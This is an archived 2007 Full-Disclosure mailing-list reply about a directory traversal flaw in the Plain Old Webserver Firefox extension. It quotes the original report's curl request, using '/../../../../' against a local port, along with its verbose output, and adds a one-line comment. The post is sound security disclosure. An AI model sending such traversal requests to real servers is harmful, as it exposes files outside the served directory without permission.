Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email firstname.lastname@example.org
Re: [Full-disclosure] [WEB SECURITY] Plain Old Webserver - The coolest firefox extension
From: Matthew Flaschen (matthew.flaschengatech.edu)
Date: Fri Feb 23 2007 - 13:21:36 CST
Stefano Di Paola wrote:
> Plain Old Web Server
> Good Old Dir Traversal
> curl "127.0.0.1:6670/../../../../" -kivvv
> * About to connect() to 127.0.0.1 port 6670
> * Trying 127.0.0.1... connected
> * Connected to 127.0.0.1 (127.0.0.1) port 6670
>> GET /../../../../ HTTP/1.1
Yep, I think it's just a rite of passage for all web servers.
Full-Disclosure - We believe in it.
Hosted and sponsored by Secunia - http://secunia.com/
- application/pgp-signature attachment: OpenPGP digital signature